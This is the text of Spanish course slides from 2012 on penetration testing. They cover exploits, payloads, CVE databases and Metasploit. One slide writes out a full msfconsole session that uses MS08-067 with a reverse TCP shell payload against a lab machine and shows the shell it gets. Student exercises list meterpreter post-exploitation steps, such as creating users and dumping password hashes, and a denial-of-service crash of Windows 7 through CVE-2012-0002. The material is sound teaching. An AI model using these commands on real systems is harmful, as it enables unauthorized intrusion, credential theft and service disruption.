Sad tema2 pen_test_iii

23
Seguridad y Alta Disponibilidad: Test de intrusión (III): explotación de vulnerabilidades Jesús Moreno León jesus.moreno.edu@ juntadeandalucía.es Septiembre 2012

description

Test de Intrusión, test de pentración, pentest,

Transcript of Sad tema2 pen_test_iii

Page 1: Sad tema2 pen_test_iii

Seguridad y Alta Disponibilidad:Test de intrusión (III): explotación de vulnerabilidades

Jesús Moreno León

jesus.moreno.edu@juntadeandalucía.es

Septiembre 2012

Page 2: Sad tema2 pen_test_iii

© Jesús Moreno León, Septiembre de 2012

Algunos derechos reservados.Este artículo se distribuye bajo la licencia

“Reconocimiento-CompartirIgual 3.0 España" de CreativeCommons, disponible en

http://creativecommons.org/licenses/by-sa/3.0/es/deed.es

Este documento (o uno muy similar)está disponible en (o enlazado desde)

http://informatica.gonzalonazareno.org

Page 3: Sad tema2 pen_test_iii

Exploits

Cuando se han encontrado los bugs, el objetivo es crear una herramienta que saque partido de ellos, es decir, que sea capaz de hacer uso de esa “funcionalidad no definida del programa”.

Para ello, se analizan las posibilidades y alcance de ese bug y se opta por un determinado exploit, que es, precisamente, un código escrito con el fin de aprovechar un bug para obtener diversos privilegios.

Todos los exploits tienen dos partes diferenciadas:

● La cabecera, que es lo que se denomina exploit puramente y que depende de cada bug

● El cuerpo, denominado payload que son acciones ya programadas que se reutilizan entre los diferentes exploits

Page 4: Sad tema2 pen_test_iii

Búsqueda de exploits

El número de vulnerabilidades que se publican diariamente es altísimo. Sin embargo, el número de exploits que se ponen disponibles no iguala ni por asomo al de vulnerabilidades

Frameworks como Metasploit son una herramienta básica para todo pentester, pero no contiene todos los exploits disponibles, ya que, por ejemplo, muchos exploits sólo se incluyen en frameworks comerciales, como Canvas de Immunity, ya que son desarrollados con sus equipos de exploiters y no son públicos

Una buena base de datos es la de http://www.cvedetails.com

Fuente: Seguridad Apple http://www.seguridadapple.com/2012/10/cve-

details-buscar-exploits-para.html

Page 5: Sad tema2 pen_test_iii

CVEDetails

Page 6: Sad tema2 pen_test_iii

CVEDetails

Page 7: Sad tema2 pen_test_iii

Explotando los bugs

Metasploit es una herramienta que aúna una base de datos de cabeceras de exploits y de payloads.

Se usa por profesionales de la seguridad informática para realizar Pentests, administradores de sistemas para verificar la instalación de parches e investigadores de todo el mundo para realizar pruebas.

http://www.metasploit.com/

Page 8: Sad tema2 pen_test_iii

Metasploit Express

La versión Express es de pago y no es más que un front-end para el framework Metasploit que incorpora funcionalidades que automatizan el proceso de un test de intrusión y permite generar informes con los resultados. Pasos a seguir:

1. Crear un proyecto

2. Descubrir dispositivos

3, Conseguir acceso a los equipos

4. Tomar el control de una sesión

5. Recoger datos de las máquinas atacadas

6. Limpiar la sesión

7. Generar un informe

Page 9: Sad tema2 pen_test_iii

Metasploit Express

Veamos los pasos a seguir para conseguir una sesión en este equipo, que es un Windows XP en el que un usuario está navegando por Internet

Page 10: Sad tema2 pen_test_iii

Metasploit Express

Page 11: Sad tema2 pen_test_iii

Metasploit Express

Page 12: Sad tema2 pen_test_iii

Metasploit Express

Page 13: Sad tema2 pen_test_iii

Metasploit Express

Page 14: Sad tema2 pen_test_iii

Metasploit Express

Page 15: Sad tema2 pen_test_iii

Metasploit Express

Page 16: Sad tema2 pen_test_iii

Metasploit Express

Page 17: Sad tema2 pen_test_iii

Metasploit Express

Page 18: Sad tema2 pen_test_iii

Metasploit Express

Page 19: Sad tema2 pen_test_iii

Metasploit Framework

Este framework incluye herramientas, bibliotecas, módulos y una interfaz de usuario. La funcionalidad básica es un lanzador de módulos que permite al usuario configurar un exploit y lanzarlo contra un equipo objetivo. Si el exploit tiene éxito, se ejecuta el payload en el objetivo y se le facilita al usuario una shell para interactuar con el payload.

http://www.elladodelmal.com/2010/07/metasploit-con-adobe-flash-player-un.html

Page 20: Sad tema2 pen_test_iii

Metasploit Framework

¿Cómo se configuran y se lanzan los exploits con el framework?msf> use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi)> set RHOST X.X.X.XRHOST => 192.168.56.101

msf exploit(ms08_067_netapi)> set PAYLOAD windows/shell_reverse_tcpPAYLOAD => windows/shell_reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST Y.Y.Y.YLHOST => 192.168.56.1

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP - Service Pack 3 – lang:Spanish[*] Selected Target: Windows XP SP3 Spanish (NX)[*] Attempting to trigger the vulnerability...Microsoft Windows XP [Versi?n 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Page 21: Sad tema2 pen_test_iii

Metasploit Framework

● Práctica 1: aprovechando la misma vulnerabilidad y usando el mismo exploit, utiliza el payload meterpreter e investiga todas las posibilidades que te ofrece una vez conseguida una sesión en la máquina objetivo:

● Subir ficheros● Ejecutar programas● Descargar ficheros● Activar el acceso remoto● Crear usuarios● Copiar las hashes de las passwords● ...

Page 22: Sad tema2 pen_test_iii

Metasploit Framework

● Práctica 2: DOS a Windows 7, a través de una versión no actualizada del escritorio remoto

CVE-2012-0002

1. Localizar exploit

2. Configurar exploit

3. Lanzar exploit

4. Pantallazo azul

Page 23: Sad tema2 pen_test_iii

Más información

● Estas diapositivas están basadas en el curso Pentesting con Metasploit Framework, impartido por Pablo González de Informática 64.

● http://www.flu-project.com

● http://www.seguridadapple.com

● www.elladodelmal.com/